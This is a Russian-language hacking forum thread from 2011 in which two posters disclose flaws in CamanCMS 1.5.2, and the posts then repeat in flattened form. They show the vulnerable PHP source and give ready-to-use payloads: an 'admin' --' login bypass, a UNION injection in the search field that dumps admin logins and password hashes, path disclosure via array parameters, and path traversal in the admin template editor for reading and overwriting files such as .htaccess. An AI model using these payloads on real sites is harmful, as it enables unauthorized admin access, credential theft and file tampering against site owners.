CamanCMS

Krist · 07.02.2011, 20:58

CamanCMS

sql-inj (Заходим под админом)
login.php

PHP код:


			
// ...

if($_GET["do"] == "login")

    {

    $login = htmlspecialchars($_POST["login"]); 

    $password = md5(htmlspecialchars($_POST["password"])); 

        

        $query_user = @mysql_query("SELECT * FROM ".$pref."users WHERE login='".$login."' AND password='".$password."' LIMIT 1");

// ...

Код:

Login: admin' -- 
Password: любой

sql-inj
search.php

PHP код:


			
// ...

$search = htmlspecialchars($_POST["search"]);



$query_search = @mysql_query("SELECT * FROM ".$pref."news WHERE short_news LIKE '%$search%' OR full_news LIKE '%$search%'"); 

// ...

Код:

В поле поиска вводим: ' union select 1,2,concat_ws(0x3b,login,password),4,5,6,7,8 from users where admin=1--

Раскрытие путей
Из-за htmlspecialchars в search.php (код выше)

Код:

http://localhost/search/
POST: search[]

2.

Код:

И в login.php
POST:login[]

~d0s~ · 07.02.2011, 22:04

Произвольное чтение файлов и запись информации в файлы
version: CamanCMS 1.5.2
Need:
admin account

admin/template.php

PHP код:


			
if(!$_GET["shab"]) {$file_edit = "main.tpl";}

else {$file_edit = $_GET["shab"];}

//...

$file_name = '../template/'.$file_edit.'';

$r = @fopen($file_name,'r');

$text = @fread($r,filesize($file_name));

//...

<form action="edit_template.php?shab={$file_edit}" method="post">

<textarea style="height: 600px; width: 99%;" name="template">{$text}</textarea><br>

<input type="submit" value="Изменить шаблон">

</form>

admin/edit_template.php

PHP код:


			
//...

$file_name = "../template/".$_GET["shab"]."";

$text = $_POST["template"];

$text = @stripcslashes($text);

$w=@fopen($file_name,'w');

@fwrite($w,$text);

Эксплуатация:

Код:

http://localhost/caman/admin/template.php?shab=../.htaccess

Cкачать можно тут: http://www.script-php.ru/cms_sistemy_upravleniya_saytom/1286-camancms-152.html

07.02.2011, 20:58	#1
Krist Регистрация: 30.01.2011 Сообщений: 13 Репутация: 11	CamanCMS CamanCMS sql-inj (Заходим под админом) login.php PHP код: `// ... if($_GET["do"] == "login") { $login = htmlspecialchars($_POST["login"]); $password = md5(htmlspecialchars($_POST["password"])); $query_user = @mysql_query("SELECT * FROM ".$pref."users WHERE login='".$login."' AND password='".$password."' LIMIT 1"); // ...` Код: Login: admin' -- Password: любой sql-inj search.php PHP код: `// ... $search = htmlspecialchars($_POST["search"]); $query_search = @mysql_query("SELECT * FROM ".$pref."news WHERE short_news LIKE '%$search%' OR full_news LIKE '%$search%'"); // ...` Код: В поле поиска вводим: ' union select 1,2,concat_ws(0x3b,login,password),4,5,6,7,8 from users where admin=1-- Раскрытие путей Из-за htmlspecialchars в search.php (код выше) Код: http://localhost/search/ POST: search[] 2. Код: И в login.php POST:login[]

07.02.2011, 22:04	#2
~d0s~ Регистрация: 03.08.2010 Сообщений: 45 Репутация: 26	Произвольное чтение файлов и запись информации в файлы version: CamanCMS 1.5.2 Need: admin account admin/template.php PHP код: `if(!$_GET["shab"]) {$file_edit = "main.tpl";} else {$file_edit = $_GET["shab"];} //... $file_name = '../template/'.$file_edit.''; $r = @fopen($file_name,'r'); $text = @fread($r,filesize($file_name)); //... <form action="edit_template.php?shab={$file_edit}" method="post"> <textarea style="height: 600px; width: 99%;" name="template">{$text}</textarea><br> <input type="submit" value="Изменить шаблон"> </form>` admin/edit_template.php PHP код: `//... $file_name = "../template/".$_GET["shab"].""; $text = $_POST["template"]; $text = @stripcslashes($text); $w=@fopen($file_name,'w'); @fwrite($w,$text);` Эксплуатация: Код: http://localhost/caman/admin/template.php?shab=../.htaccess Cкачать можно тут: http://www.script-php.ru/cms_sistemy_upravleniya_saytom/1286-camancms-152.html

Опции темы	Поиск в этой теме
Версия для печати Отправить по электронной почте	Поиск в этой теме: Расширенный поиск
Опции просмотра
Линейный вид Комбинированный вид Древовидный вид